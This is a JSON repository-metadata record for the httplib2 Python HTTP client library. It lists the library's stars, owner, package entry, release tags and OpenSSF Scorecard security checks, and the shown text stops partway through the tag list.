{"id":371807,"url":"https://github.com/httplib2/httplib2","last_synced_at":"2026-08-25T14:17:18.757Z","repository":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"packages":[{"id":6119611,"name":"py-httplib2","ecosystem":"alpine","description":"A Python HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2017-10-31T19:05:02.000Z","latest_release_published_at":"2017-10-31T19:05:02.000Z","latest_release_number":"0.10.3-r0","last_synced_at":"2026-03-08T18:56:45.177Z","created_at":"2023-01-31T21:39:12.954Z","updated_at":"2026-08-22T18:06:25.399Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.7/main/x86_64/py-httplib2","install_command":"apk add py-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0